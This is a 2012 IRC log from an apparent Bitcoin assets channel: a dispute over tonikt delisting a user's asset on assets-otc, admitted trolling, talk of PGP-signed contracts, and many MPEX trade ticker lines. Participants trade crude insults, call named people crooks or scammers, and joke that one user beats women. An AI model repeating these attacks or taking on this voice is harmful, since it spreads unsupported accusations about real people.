spoke these words to does not have any OTC rating Oct 21 15:04:23 because he says that OTC is shit Oct 21 15:04:34 (though that may not be an exact quite) Oct 21 15:04:38 quote* Oct 21 15:05:07 [08:03:21] yeah, i was wondering what otc ratings were behind the words "If they are licking your balls, or compromising my reputation - yes!" Oct 21 15:05:08 see Oct 21 15:05:10 what I dont get is Oct 21 15:05:16 why is that guy against homosexuality? Oct 21 15:05:17 So if you don't have the full picture, how dare you judging me by one sentence, not even spoken towards you? Oct 21 15:05:20 its bad enough we have luke Oct 21 15:05:45 Ball licking between two consensual adults is protected by the constitution. Oct 21 15:05:51 where is the judging? Oct 21 15:06:14 kakobrekla: implication that ball licking is bad Oct 21 15:06:21 yep Oct 21 15:06:24 :) Oct 21 15:06:38 meh Oct 21 15:06:47 and not seeing it as a metaphore Oct 21 15:07:19 fi you would have said "kiss ass" instead of "lick balls" - would that sound better to you? Oct 21 15:07:42 and would that be then acceptable? Oct 21 15:07:47 or still not...? Oct 21 15:08:04 no one is kissing anyone's ass anyhow Oct 21 15:08:10 eskimobob and goat are both forum trolls Oct 21 15:08:18 and btw Oct 21 15:08:20 ;;getrating EskimoBob Oct 21 15:08:20 WARNING: Currently not authenticated. User eskimobob, rated since Sat Jun 4 09:35:57 2011. Cumulative rating -3, from 4 total ratings. Received ratings: 2 positive, 2 negative. Sent ratings: 3 positive, 4 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=eskimobob Oct 21 15:09:26 you knew this before you let him be an issuer in assets otc? Oct 21 15:10:04 No - I gave him the benefit of the doubt Oct 21 15:10:18 But as I said: he just blew it a few days later Oct 21 15:10:18 your mistake. Oct 21 15:11:04 And I don't see any harm done, so I do not understand why you are acting like EskimoBob was a victim and you were his advocate Oct 21 15:11:19 A minor mistake - and fixed already Oct 21 15:11:26 No harm done Oct 21 15:13:18 the lack of biz ethics in bitcoin bothers me Oct 21 15:13:27 thats this topic is interesting to me. Oct 21 15:13:33 thats why* Oct 21 15:14:26 biz ethics - wtf is this? Oct 21 15:14:38 exactly Oct 21 15:14:42 never heard about anything like this Oct 21 15:14:56 why wont you teach me, then? Oct 21 15:15:07 I have the whole afternoon Oct 21 15:15:16 i dont Oct 21 15:16:23 But tell me please, was it more the balls related sentence I spoke to Goat - or the fact that i fixed my mistake and kicked EskimoBob's asset out of my service - which one of the two violated the biz ethics? Oct 21 15:16:27 this drama and unstability is tiresome. I am glad that this little man flipped out so early and not at some later date. Egomaniacs and primadonnas are bad news and annoying Oct 21 15:16:52 tonikt: they both trolled you and won Oct 21 15:17:03 I did not troll him at all Diablo-D3 Oct 21 15:17:16 EskimoBob: you did too Oct 21 15:17:22 unless you have no idea wtf trolling means Diablo-D3 :) Oct 21 15:17:23 I dont care about they trolling me Oct 21 15:17:27 For me its fun Oct 21 15:17:34 how so Diablo-D3 ? Oct 21 15:17:35 And I dont care about EskimoBob neither Goat Oct 21 15:17:36 EskimoBob: you had a legitimate asset listed on his service, correct? Oct 21 15:17:50 I just wander what does kakobrekla have against me and my ethics? Oct 21 15:17:51 Diablo-D3: yes Oct 21 15:17:59 EskimoBob: legitimate assets are considered trolling now Oct 21 15:18:17 tonikt: you have no ethics, obviously Oct 21 15:18:34 OK, Diablo-D3 LOL Oct 21 15:18:43 EskimoBob: srsly, ask nefario Oct 21 15:18:45 EskimoBob: as for your standards, I really hope that you see me like this :) Oct 21 15:18:45 dohohohohohohohohoho Oct 21 15:18:58 a man with no ethics Oct 21 15:19:10 tonikt: are you sure you are a man? Oct 21 15:19:29 EskimoBob: why would you care if I'm a man? Oct 21 15:19:36 maybe you are a lonely and angry girl? Oct 21 15:19:40 You do business with Goats daily Oct 21 15:19:52 do I ? Oct 21 15:19:59 I did not know that Oct 21 15:20:24 Well, not anymore, after your other hero Nefario shut down the webpage Oct 21 15:20:36 my hero? Oct 21 15:20:41 But you are still kissing Goats ass Oct 21 15:20:42 are you serious or just trolling? Oct 21 15:20:51 how do I kiss goats ass? Oct 21 15:20:59 Do I sound serious? Oct 21 15:21:04 Thanking him for a warning? Oct 21 15:21:19 Ho do you kiss his ass? Oct 21 15:21:22 [MPEX] [S.MPOE] 33700 @ 0.00043154 = 14.5429 BTC [+] Oct 21 15:21:30 I just gave you a quote - look above Oct 21 15:21:48 i do not see it tonikt Oct 21 15:21:53 And I am sure I could find hundreds of such on bitcaoointalk Oct 21 15:22:11 i thanked him for a warning and that was it. Oct 21 15:22:13 Then look closer Oct 21 15:22:24 worst thing is, he was RIGHT! you are unstable :) Oct 21 15:23:00 Oh, I am extremely stable - I just don't do business with crooks Oct 21 15:23:14 And as soon as I identify one, I just kick him out Oct 21 15:23:18 fuck dude, you are funny little man Oct 21 15:23:26 LOL Oct 21 15:23:27 OK, I am afk now. keep yapping Oct 21 15:23:31 But for all the other, nobody complains about my stability Oct 21 15:23:53 whoa wall of convo Oct 21 15:24:00 im not reading this backlog >.< Oct 21 15:24:24 stability? you have none to complain about :P Oct 21 15:24:54 who's tonikt ? Oct 21 15:25:48 mircea_popescu: assets-otc.com Oct 21 15:26:03 ahaha ok. Oct 21 15:26:13 how's the copycat business? Oct 21 15:26:44 calm Oct 21 15:27:00 Definietlly less profitable than yours Oct 21 15:27:18 I's actually say: a negative profit :) Oct 21 15:28:05 ya well... Oct 21 15:28:05 But it does have a future - best security a man can get so after all the other exchanges get hacked, robbed or closed - mine will be the only one left :) Oct 21 15:28:22 At least that's the plan :) Oct 21 15:28:23 dude, you're just another misguided youth. Oct 21 15:28:34 Man, I'm 36 Oct 21 15:28:36 thinking you can replicate the things by copying what you perceive of their surface. Oct 21 15:28:40 that's sad. Oct 21 15:28:44 you should be 18ish. Oct 21 15:28:57 You obviously dont understand my system if you think I copied your idea Oct 21 15:29:08 obviously. Oct 21 15:29:12 I told you: I dont even know what your idea is about Oct 21 15:29:13 also, you are completely new and surprising, Oct 21 15:29:19 innovative and will take over the world. Oct 21 15:29:29 at least... that's the plan. Oct 21 15:30:11 Well, I cannot be 18 anymore - thats one thing for sure Oct 21 15:30:20 But as for the rest... we will see Oct 21 15:30:28 Time will show Oct 21 15:30:45 english isn't your native tongue is it ? Oct 21 15:30:51 no Oct 21 15:31:40 but I can swear in english pretty well :P Oct 21 15:31:52 you mean curse ? Oct 21 15:32:04 yes Oct 21 15:32:20 always a good skill to have. Oct 21 15:33:24 usually some first words you learn in a language Oct 21 15:34:07 Diablo-D3> eskimobob and goat are both forum trolls <--- I troll to make a point.. i have skills :) Oct 21 15:34:51 so does he. Oct 21 15:35:23 this drama and unstability is tiresome. I am glad that this little man flipped out so early and not at some later date. Egomaniacs and primadonnas are bad news and annoying <--- this is why i was trolling, i wanted him to go nuts sooner rather than later Oct 21 15:35:36 who ?! Oct 21 15:36:41 oh, they keep exploiting the fact that I kicked out EskimoBob's asset from assets-otc Oct 21 15:36:43 ;;echo Chaang-Noi who ? Oct 21 15:36:44 Chaang-Noi who ? Oct 21 15:36:47 like I cared :) Oct 21 15:37:08 oh come on Chaang-Noi, you find a reason in aftermath for everything you do Oct 21 15:37:28 no, i even sent a pm about it to scholastic Oct 21 15:37:34 im not kidding Oct 21 15:37:42 jesus there's so much nothing happening in btc every day i find it impossible to keep track Oct 21 15:37:46 anyone has cliffnotes ? Oct 21 15:37:52 as soon as i found out who was running that service i went there to fuck with his head Oct 21 15:38:13 kakobrekla read the thread, im clearly trolling with him and trying to provoke him Oct 21 15:38:25 he just going nuts on eskimobob was unexpected Oct 21 15:38:52 i just assume i would make him look crazy with his conspiricy theorys Oct 21 15:38:59 EskimoBob: so now you see who to blame - Goat provoked me to kick you out :) Oct 21 15:39:05 he did more than i expected but that was my goat... Oct 21 15:39:11 gaol* Oct 21 15:39:26 .... and I just could not stand the pressure the guy put onto me :) Oct 21 15:39:32 i dont have you on ignore mircea Oct 21 15:39:43 14:37.51 ( Chaang-Noi ) as soon as i found out who was running that service i went there to fuck with his head < - so you are saying you had something against tonikt before this drama now? what was it? Oct 21 15:40:09 go read the thread, he went into all my asset threads and made silly claims about me selling fake bonds Oct 21 15:40:19 he even called neferio and theymos as pat of my bitches Oct 21 15:40:22 that they lied for me Oct 21 15:40:23 so to make a long story short, eskimobobby launched some asset (was it that recording studio thing ?) and tonikt pulled a nefario/goat thing ? Oct 21 15:40:26 this guy is a nutter Oct 21 15:40:36 yes mircea Oct 21 15:40:41 more or less Oct 21 15:40:46 fascinating. so meta... Oct 21 15:40:54 mircea_popescu :D Oct 21 15:40:55 the thing is, we dont know why he did it Oct 21 15:41:08 what do you mean why ?! TO BE A REAL EXCHANGE Oct 21 15:41:21 Kakobrekla you should read the thread, and see all the crazy attacks he has made aginst me Oct 21 15:41:39 mircea_popescu: unlike you I dont run an exchange Oct 21 15:41:42 i dont have time currently if its not a single post. Oct 21 15:41:43 kakobrekla didja see live.coinbr btw ? Oct 21 15:41:50 no Oct 21 15:42:01 mmm was it live.coinbr.com i think Oct 21 15:42:09 aha Oct 21 15:42:23 yes Oct 21 15:42:26 ya that's it Oct 21 15:42:27 cute :) Oct 21 15:43:13 mircea i really appreciate you puting in faq :) Oct 21 15:43:15 i dunno, it has all that css ;/ Oct 21 15:43:19 jurov hehe sure. Oct 21 15:44:59 tonikt, while you are here, can you please explain why you aren't same thing as mpex? Oct 21 15:45:24 because mpex holds bitcoins Oct 21 15:45:27 mpex is trusted and stable :) Oct 21 15:45:28 while I don't Oct 21 15:45:53 tonikt why did you think nefario lied and let me sell "counterfit" bonds? Oct 21 15:46:08 why do you keep calling him "my bitch" Oct 21 15:46:08 I only help to process PGP signed contracts and the bitcoin payments go over the counter Oct 21 15:46:18 are you not aware of our relationship? :) Oct 21 15:46:53 .. plus lets face it: mpex looks like shit :) Oct 21 15:47:11 while the UI of my service is pretty intuitive Oct 21 15:47:13 [MPEX] [S.MPOE] 3450 @ 0.00043154 = 1.4888 BTC [+] Oct 21 15:47:15 [MPEX] [S.MPOE] 6559 @ 0.00043237 = 2.8359 BTC [+] Oct 21 15:47:23 tonikt, where is the advantage to selling assets over bitcoin-otc directly? Oct 21 15:47:45 paying dividends Oct 21 15:48:03 with tonikt you get to trust the assets will be delisted almost at random, lol Oct 21 15:48:08 and talking about UI, bitcoin-otc at least has some order book, do you have one? Oct 21 15:48:27 Since the page helps to keep the account balanaces it can help to pay out dividends, proportionally to the share owned Oct 21 15:49:59 jurov: If you were an asset issuer, you'd definitely prefer to use the system like assets-otc, rather than keep all the books manually Oct 21 15:50:42 It automates a pretty huge part of the bureaucracy behind bookkeeping Oct 21 15:50:51 okay, that's nice but i'm asking about order book atm. Oct 21 15:51:12 order book - I just suggest to use the OTC one Oct 21 15:51:23 why to re-invent the wheel Oct 21 15:52:13 oh, then you are NOT an exchange. just some app to help asset issuers. Oct 21 15:52:49 exactly Oct 21 15:53:08 I'm saying it all the time - but people just dont seem to get it Oct 21 15:53:46 You can store assets at assets-otc, you get a PGP signed receipts, but it is not a trading platform Oct 21 15:56:09 hm.. wouldn't that work much better as desktop app, at least for asset holders? Oct 21 15:56:32 assets-otc is more like a bitcoin wallet, rather than a bitcoin exchange Oct 21 15:56:48 jurov: isn't a web browser also a desktop app? Oct 21 15:57:12 plus of course, to handle the service you need a desktop app: GnuPG Oct 21 15:57:34 as seen in the past, some will rather die than to copy/paste text to gpg and paste the result back to browser Oct 21 15:57:44 I know Oct 21 15:57:54 it shouldn't be hard to streamline Oct 21 15:58:04 But my service is for other customers Oct 21 15:58:21 The rkey requirement is: security Oct 21 15:58:55 Even the dividend payment tool was designed and made in a way that you can use it offline Oct 21 15:59:13 At a PC that has never been connected to a network Oct 21 16:00:22 You just download an archive with the entire history of your assets transaction - it's a zip file with PGP signed contracts inside and the keys Oct 21 16:00:51 You take this zip file to an offline PC, setup how many BTC you want to pay and run the tool.. Oct 21 16:01:09 so, dividend issuers have a nice tool they'll need maybe once a month... but end users shall fumble with gpg and browserevery time they trade? Oct 21 16:01:37 And then the tool process the contracts one by one verifying signatures - to calculate the final balance and output a proper sendmany RPC command Oct 21 16:01:52 jurov: yes Oct 21 16:02:19 But don't the end users care about the security of their assets? Oct 21 16:02:48 tell me, why should be a desktop app that just calls gpg insecure? Oct 21 16:03:02 I think they do - and so eventually, after another exchange crashes, they will finally understand that a system like assets-otc is the only ultimatelly secured solution Oct 21 16:03:42 jurov: I'm not saying that a desktop app would not be secured Oct 21 16:04:31 but it would be kind of hard to distribute a new desktop app (in binary version, I presume) with the same kind of trust as the old fasion gpg has already Oct 21 16:04:49 I mean: bitcoin-otc has been using it - so people know how to handle it Oct 21 16:04:55 At least some people... Oct 21 16:05:23 I guess you could ask the same question to nanotube: why he did not come out with a desktop app, instead on the bot? Oct 21 16:12:32 [MPEX] [S.MPOE] 25941 @ 0.00043237 = 11.2161 BTC [+] Oct 21 16:12:32 [MPEX] [S.MPOE] 1759 @ 0.00043324 = 0.7621 BTC [+] Oct 21 16:12:41 Definitelly assets-otc is not for daily traders Oct 21 16:13:41 ... but more for long time investors, who dont mind to copy/past gpg stuff one a month or so, just to make sure that nobody will put hands on their assets/bitcoins during the process Oct 21 16:16:27 And in practice it's not harder to use it than bitcoin-otc Oct 21 16:38:08 [MPEX] [S.MPOE] 10800 @ 0.00043262 = 4.6723 BTC [-] Oct 21 16:56:38 ;;rate EskimoBob good dealings Oct 21 16:56:39 Error: 'good' is not a valid integer. Oct 21 16:56:44 ;;rate EskimoBob 2 good dealings Oct 21 16:56:47 Rating entry successful. Your rating of 2 for user EskimoBob has been recorded. Oct 21 17:02:30 Thank you pigeons. I have your coin BTW. As you know, tonikt got mad and delisted my project. I am going to look for another listing option. Do you want me to send you back your coin? Oct 21 17:04:02 [MPEX] [S.MPOE] 7300 @ 0.00043059 = 3.1433 BTC [-] Oct 21 17:04:04 [MPEX] [S.MPOE] 23319 @ 0.00043052 = 10.0393 BTC [-] Oct 21 17:04:05 [MPEX] [S.MPOE] 11100 @ 0.00042888 = 4.7606 BTC [-] Oct 21 17:04:06 [MPEX] [S.MPOE] 781 @ 0.00042837 = 0.3346 BTC [-] Oct 21 17:06:03 I'd prefer if you issue an OT contract, even if its on an OT server i have to setup Oct 21 17:06:30 we'll figure something out Oct 21 17:11:15 tonikt: you forgot to mention that your security = delisted at any time you are in a bad mood Oct 21 17:12:28 jurov: OT has all that functionality with 2 major differences - you can not be delisted by a moody joker and it has quoting system Oct 21 17:13:26 pigeons: I think I am going the OT way and I'll find someone who issues the BTC derivative or do it myself as a market maker Oct 21 17:14:16 I am going to use the contract I have up in the forum and the divs will be around 20% a year Oct 21 17:14:29 or more Oct 21 17:18:21 heh, I got that lesson with nefario =/ Oct 21 17:19:18 Nefario is another type of asshole. This pior_n fuck just wasted my time :) Oct 21 17:21:55 if we get the securities out of the GLBSE, we can move on but assets-otc is out for good. It offers nothing that OT can not Oct 21 17:23:43 heh Oct 21 17:29:35 [MPEX] [S.MPOE] 37800 @ 0.00042851 = 16.1977 BTC [+] Oct 21 17:54:48 [MPEX] [S.MPOE] 6290 @ 0.00043198 = 2.7172 BTC [+] Oct 21 17:54:49 [MPEX] [S.MPOE] 27110 @ 0.00043262 = 11.7283 BTC [+] **** BEGIN LOGGING AT Mon Oct 22 02:29:20 2012 Oct 22 02:31:12 [MPEX] [S.MPOE] 16000 @ 0.00042953 = 6.8725 BTC [+] Oct 22 02:33:25 http://imgur.com/gallery/rhPlU Oct 22 02:33:34 dare someone to post that as a reply to goat on the forums Oct 22 02:34:08 lol Oct 22 02:39:40 hat drama is going on? Oct 22 02:39:43 what* Oct 22 02:39:59 I'll post it Oct 22 02:40:08 for .5 btc Oct 22 02:41:06 lol how's that worth 6 dollars ? Oct 22 02:42:31 I'm just hustlin' man gotta get dat papuh Oct 22 02:42:42 you gettin' your papuh right? Oct 22 02:43:37 http://imgur.com/gallery/QnMOm Oct 22 02:43:40 the wrath of god Oct 22 02:48:52 what is goat saying on the forums Oct 22 02:51:24 thestringpuller: who knows Oct 22 02:51:29 just find a thread and be like BAM Oct 22 02:51:59 "once the news about what we are talking about gets out, MPEX will be under huge pressure, if they want or not" Oct 22 02:52:04 how's that pressure coming along btw ? Oct 22 02:52:12 takes moar than two weeks ? Oct 22 02:52:24 mircea_popescu: china is jerking as fast as they can Oct 22 02:52:34 lol Oct 22 02:56:18 http://buckworthsolicitors.co.uk/wp-content/uploads/2011/05/Michael-Buckworth-271-x-302.jpg <<< does this look like an internet lawyer or what! Oct 22 02:56:35 [MPEX] [S.MPOE] 18777 @ 0.00042873 = 8.0503 BTC [-] Oct 22 02:57:12 mircea_popescu: internet lawyer is another word for douchebag, yeah? Oct 22 02:58:40 yeah Oct 22 03:14:08 mircea_popescu: why do all british lawyers have funny teeth... Oct 22 03:14:18 like steve buscemi Oct 22 03:14:22 i dunno, custard pie ? Oct 22 03:17:46 so what's new mircea? Oct 22 03:21:50 [MPEX] [S.MPOE] 23500 @ 0.00042953 = 10.094 BTC [+] Oct 22 03:21:50 [MPEX] [S.MPOE] 4319 @ 0.00042961 = 1.8555 BTC [+] Oct 22 03:22:13 thestringpuller not much really. Oct 22 03:23:42 what time is it over there? Oct 22 03:23:46 4AM or something? Oct 22 03:24:33 3 Oct 22 03:32:01 do you know of any C based web frameworks? Oct 22 03:32:24 you mean cgi ? Oct 22 03:32:50 .g common gateway interface Oct 22 03:33:02 omg still no markac! Oct 22 03:33:05 hmm Oct 22 03:33:57 i guess that would work Oct 22 03:48:12 [MPEX] [S.MPOE] 15776 @ 0.00042873 = 6.7636 BTC [-] Oct 22 04:14:04 [MPEX] [S.MPOE] 6147 @ 0.00042873 = 2.6354 BTC [-] Oct 22 04:14:05 [MPEX] [S.MPOE] 4996 @ 0.00042801 = 2.1383 BTC [-] Oct 22 04:14:06 [MPEX] [S.MPOE] 7952 @ 0.00042792 = 3.4028 BTC [-] Oct 22 04:39:42 [MPEX] [S.MPOE] 7081 @ 0.00042961 = 3.0421 BTC [+] Oct 22 04:39:43 [MPEX] [S.MPOE] 34619 @ 0.0004306 = 14.9069 BTC [+] Oct 22 05:04:56 [MPEX] [S.MPOE] 1981 @ 0.0004306 = 0.853 BTC [+] Oct 22 05:04:57 [MPEX] [S.MPOE] 21340 @ 0.00043102 = 9.198 BTC [+] Oct 22 05:04:59 [MPEX] [S.MPOE] 2174 @ 0.00043103 = 0.9371 BTC [+] Oct 22 05:05:00 [MPEX] [S.MPOE] 4505 @ 0.00043194 = 1.9459 BTC [+] Oct 22 05:07:20 [MPEX] [S.MPOE] 33295 @ 0.00043194 = 14.3814 BTC [+] Oct 22 05:07:22 [MPEX] [S.MPOE] 39456 @ 0.00043254 = 17.0663 BTC [+] Oct 22 05:07:23 [MPEX] [S.MPOE] 52202 @ 0.00043312 = 22.6097 BTC [+] Oct 22 05:07:24 [MPEX] [S.MPOE] 24098 @ 0.00043324 = 10.4402 BTC [+] Oct 22 05:07:25 [MPEX] [S.MPOE] 30300 @ 0.00043347 = 13.1341 BTC [+] Oct 22 05:07:26 [MPEX] [S.MPOE] 20300 @ 0.00043349 = 8.7998 BTC [+] Oct 22 05:07:27 [MPEX] [S.MPOE] 28700 @ 0.00043438 = 12.4667 BTC [+] Oct 22 05:07:28 [MPEX] [S.MPOE] 10900 @ 0.00043463 = 4.7375 BTC [+] Oct 22 05:07:29 [MPEX] [S.MPOE] 27700 @ 0.00043475 = 12.0426 BTC [+] Oct 22 05:07:30 [MPEX] [S.MPOE] 14600 @ 0.00043511 = 6.3526 BTC [+] Oct 22 05:07:31 [MPEX] [S.MPOE] 1265 @ 0.00043551 = 0.5509 BTC [+] Oct 22 05:07:32 [MPEX] [S.MPOE] 9600 @ 0.00043591 = 4.1847 BTC [+] Oct 22 05:07:33 [MPEX] [S.MPOE] 48105 @ 0.00043599 = 20.9733 BTC [+] Oct 22 05:07:35 [MPEX] [S.MPOE] 48428 @ 0.00043602 = 21.1156 BTC [+] Oct 22 05:07:35 [MPEX] [S.MPOE] 55200 @ 0.00043607 = 24.0711 BTC [+] Oct 22 05:07:36 [MPEX] [S.MPOE] 22029 @ 0.00043623 = 9.6097 BTC [+] Oct 22 05:07:37 [MPEX] [S.MPOE] 42300 @ 0.00043626 = 18.4538 BTC [+] Oct 22 05:07:38 [MPEX] [S.MPOE] 4300 @ 0.00043645 = 1.8767 BTC [+] Oct 22 05:07:39 [MPEX] [S.MPOE] 32797 @ 0.00043646 = 14.3146 BTC [+] Oct 22 05:07:40 [MPEX] [S.MPOE] 14469 @ 0.00043652 = 6.316 BTC [+] Oct 22 05:07:41 [MPEX] [S.MPOE] 36035 @ 0.00043675 = 15.7383 BTC [+] Oct 22 05:07:42 [MPEX] [S.MPOE] 25300 @ 0.00043688 = 11.0531 BTC [+] Oct 22 05:07:43 [MPEX] [S.MPOE] 3686 @ 0.00043699 = 1.6107 BTC [+] Oct 22 05:07:44 [MPEX] [S.MPOE] 4541 @ 0.00043756 = 1.987 BTC [+] Oct 22 05:07:44 [MPEX] [S.MPOE] 49000 @ 0.00043766 = 21.4453 BTC [+] Oct 22 05:07:45 [MPEX] [S.MPOE] 33400 @ 0.00043772 = 14.6198 BTC [+] Oct 22 05:07:46 [MPEX] [S.MPOE] 56900 @ 0.00043772 = 24.9063 BTC [+] Oct 22 05:07:47 [MPEX] [S.MPOE] 47500 @ 0.00043805 = 20.8074 BTC [+] Oct 22 05:07:48 [MPEX] [S.MPOE] 20900 @ 0.0004381 = 9.1563 BTC [+] Oct 22 05:07:49 [MPEX] [S.MPOE] 37675 @ 0.00043888 = 16.5348 BTC [+] Oct 22 05:07:51 [MPEX] [S.MPOE] 44711 @ 0.00043908 = 19.6317 BTC [+] Oct 22 05:07:51 wat Oct 22 05:07:52 [MPEX] [S.MPOE] 42700 @ 0.00043928 = 18.7573 BTC [+] Oct 22 05:07:53 [MPEX] [S.MPOE] 46200 @ 0.0004397 = 20.3141 BTC [+] Oct 22 05:07:54 [MPEX] [S.MPOE] 47600 @ 0.00043979 = 20.934 BTC [+] Oct 22 05:07:54 [MPEX] [S.MPOE] 96386 @ 0.00044 = 42.4098 BTC [+] Oct 22 05:07:55 [MPEX] [S.MPOE] 1000 @ 0.00044014 = 0.4401 BTC [+] Oct 22 05:07:56 [MPEX] [S.MPOE] 24400 @ 0.00044033 = 10.7441 BTC [+] Oct 22 05:07:57 [MPEX] [S.MPOE] 22022 @ 0.00044061 = 9.7031 BTC [+] Oct 22 05:26:17 mpoe blew up Oct 22 05:29:02 thestringpuller what happened to mpoe? Oct 22 05:31:05 !ticker s.mpoe Oct 22 05:31:06 [MPEX:S.MPOE] 1day: 0.00042792 / 0.00043299 / 0.00044061 (2641504 shares, 1,143.76 BTC), 30day: 0.00025015 / 0.00036942 / 0.00046059 (90162666 shares, 33,308.55 BTC) Oct 22 05:34:02 [MPEX] [S.DICE] 29629 @ 0.003375 = 99.9979 BTC [-] Oct 22 05:37:27 o hey, new max Oct 22 05:37:46 in other news, "Good news. We have figured out a solution for this problem. Bitmit is not going to be sold. Business as usual. We are sorry for the insecurity this may have caused." Oct 22 05:57:25 http://www.sciencedaily.com/releases/2012/10/121019141254.htm i wonder how concerned we should be Oct 22 05:59:38 [MPEX] [S.MPOE] 23800 @ 0.00043317 = 10.3094 BTC [-] Oct 22 06:02:16 not scared at all Oct 22 06:02:21 ? Oct 22 06:02:31 quantum computing is very expensive field mircea_popescu Oct 22 06:03:23 :p Oct 22 06:03:37 it's like antimatter Oct 22 06:04:21 "In 2006, Gerald Smith estimated $250 million could produce 10 milligrams of positrons[38] (equivalent to $25 billion per gram)" Oct 22 06:05:24 Bitmit didn't get sold? Oct 22 06:05:49 think they pulled the sale Oct 22 06:05:51 no, apparently the bids on that were just as fake as all therest Oct 22 06:06:02 and so they ended up selling to themselves so business as ... normal./ Oct 22 06:06:51 are there any financial figures floating around? or is it privately held? Oct 22 06:06:58 (curious as to their revenue) Oct 22 06:07:02 fake top bid was 5k or so Oct 22 06:07:11 so you could infer < 50 btc/mo Oct 22 06:07:38 micro business lol Oct 22 06:07:52 that's less than US minimum wage Oct 22 06:08:16 glbse was making for the "sharegholders" less than what the crown was paying taaki as welfare. Oct 22 06:08:23 people dont buy shit with bitcoins Oct 22 06:08:54 yes, it makes no sense to buy rl world items with bitcoin. after all the trouble you went to buy bitcoin in the first place. Oct 22 06:09:10 nefario took most of the glbse funds thats why the shareholders didnt get much :P Oct 22 06:09:37 mircea_popescu: Amir Taaki? The Intersango guy? Oct 22 06:09:44 it turns out hes really greedy :D Oct 22 06:09:47 noagendamarket even if we were to take the 500 a month figure seriously, it still doesn't pay the rent. Oct 22 06:10:04 thestringpuller yes, bitcoinconscammercy. Oct 22 06:10:54 it was more like 500 a week Oct 22 06:11:15 you can lay off now, nobody's going to pay you money for your shares anyway. Oct 22 06:11:40 I wrote them off months ago :P Oct 22 06:11:57 no, you were actively trying to sucker someone into buying them a few weeks back. Oct 22 06:12:13 no. Mine werent for sale Oct 22 06:13:04 and in general, stop trying to act like you're either legitimate or respectable. neither's the case. Oct 22 06:13:13 Theymos asked me about it but I hadnt said yes or no when nefario shut the site down Oct 22 06:13:30 fuck off wanker Oct 22 06:13:44 heh Oct 22 06:13:47 myeah. Oct 22 06:13:50 sounds like tool Oct 22 06:14:20 As my boss says, "Behind every successful person lies a pack of haters" Oct 22 06:14:38 inevitably. Oct 22 06:15:49 you're right though: "it makes no sense to buy rl world items with bitcoin. after all the trouble you went to buy bitcoin in the first place." Oct 22 06:16:23 yeah. it's just an intellectually lazy way to think "oh, im a btc entrepreneur" Oct 22 06:17:32 entrepreneur's success is generally measured by the jobs they create Oct 22 06:17:45 so more like "I'm a btc 'investor'" Oct 22 06:18:11 http://www-cs-faculty.stanford.edu/~eroberts/cs181/projects/2010-11/DigitalCurrencies/2011/06/03/bitcoins-and-the-potential-to-uplift-millions/index.html - that's what brought me back to the btc world Oct 22 06:19:53 "BitCoins might not provide us as much financial security in the short-term, but it would definitely empower us overall." Oct 22 06:20:26 Don't you feel empowered by operating MPEX mircea_popescu? Oct 22 06:21:56 no, he gets that from beating women Oct 22 06:22:23 LOL Oct 22 06:25:02 [MPEX] [S.MPOE] 15800 @ 0.00043394 = 6.8563 BTC [+] Oct 22 06:51:03 [MPEX] [S.MPOE] 12160 @ 0.00043317 = 5.2673 BTC [-] Oct 22 07:07:03 [MPEX] [S.DICE] 115000 @ 0.003375 = 388.125 BTC [-] Oct 22 07:32:08 [MPEX] [S.MPOE] 4540 @ 0.00043317 = 1.9666 BTC [-] Oct 22 07:51:48 how does one even get on welfare Oct 22 07:52:02 seems like a lot of work Oct 22 07:52:47 its easy :P Oct 22 07:53:29 in Australia even the middle class get welfare of some sort Oct 22 07:53:45 feelsgoodman.jpg Oct 22 07:54:48 Chaaang-Noi: you can always take my approach, one of the perks of having Autism is that the welfare people never fuck with me Oct 22 07:54:53 \o/ Oct 22 07:55:08 lol Oct 22 07:55:27 so lets say im in the usa and i dont want or cant work Oct 22 07:55:29 then what? Oct 22 07:55:35 youre fucked Oct 22 07:55:54 go to local walmarts and ask if you can have a large cardboard box Oct 22 07:56:02 lol so welfare is good in england and aus but not usa? Oct 22 07:56:12 I think that's pretty much the jist of it Oct 22 07:56:17 ahh Oct 22 07:56:18 there is no welfare in the usa :P Oct 22 07:56:23 i see Oct 22 07:56:26 okay good Oct 22 07:56:32 maybe ill start paying taxes then... Oct 22 07:57:11 [MPEX] [S.MPOE] 50060 @ 0.00043136 = 21.5939 BTC [-] Oct 22 07:57:13 [MPEX] [S.MPOE] 2400 @ 0.00043394 = 1.0415 BTC [+] Oct 22 07:57:13 [MPEX] [S.MPOE] 33278 @ 0.00044061 = 14.6626 BTC [+] Oct 22 07:57:14 [MPEX] [S.MPOE] 47300 @ 0.00044072 = 20.8461 BTC [+] Oct 22 07:57:15 [MPEX] [S.MPOE] 53900 @ 0.00044098 = 23.7688 BTC [+] Oct 22 07:57:16 [MPEX] [S.MPOE] 1500 @ 0.00044131 = 0.662 BTC [+] Oct 22 07:57:18 [MPEX] [S.MPOE] 11562 @ 0.00044289 = 5.1207 BTC [+] Oct 22 07:57:26 you dont get very much if you dont work in Australia either though...subsistence living Oct 22 07:58:12 thats why so many women get pregnant to get the single parents pension Oct 22 08:22:56 [MPEX] [S.MPOE] 15900 @ 0.00043247 = 6.8763 BTC [-] Oct 22 08:48:02 [MPEX] [S.MPOE] 4800 @ 0.00043247 = 2.0759 BTC [-] Oct 22 09:14:25 [MPEX] [S.MPOE] 15200 @ 0.00042852 = 6.5135 BTC [-] Oct 22 09:14:26 [MPEX] [S.MPOE] 16936 @ 0.00042823 = 7.2525 BTC [-] Oct 22 09:26:32 good day-night-morning-evening Oct 22 09:26:42 any interesting news? Oct 22 09:27:03 ;;tslb Oct 22 09:27:07 Time since last block: 20 minutes and 52 seconds Oct 22 09:27:21 same old same old... Oct 22 09:27:33 whats in the BTC TV? Any new soap operas or drama? Oct 22 09:28:58 minor pirate stuff, minoe bitcoincia stuff Oct 22 09:29:00 about it Oct 22 09:31:06 ;;tslb Oct 22 09:31:08 Time since last block: 24 minutes and 53 seconds Oct 22 09:38:11 ;;tslb Oct 22 09:38:13 Time since last block: 31 minutes and 59 seconds Oct 22 09:38:19 i heart ltc Oct 22 09:40:54 [MPEX] [S.MPOE] 18100 @ 0.00043124 = 7.8054 BTC [+] Oct 22 09:43:50 mircea_popescu: I was reading that "Breakthrough Offers New Route to Large-Scale Quantum Computing" . BTC or any crypto-blah is not fucked yet but it's getting closer. 7 more years maybe and some lab has it up and working... and then BTC will become a blip in e-pages of history Oct 22 09:44:12 ;;tslb Oct 22 09:44:15 Time since last block: 38 minutes and 1 second Oct 22 09:45:13 what are you waiting Chaang-Noi? Oct 22 09:52:57 i wanted to see if a transaction was good Oct 22 09:53:08 i used the same wallet on two computers and everything got 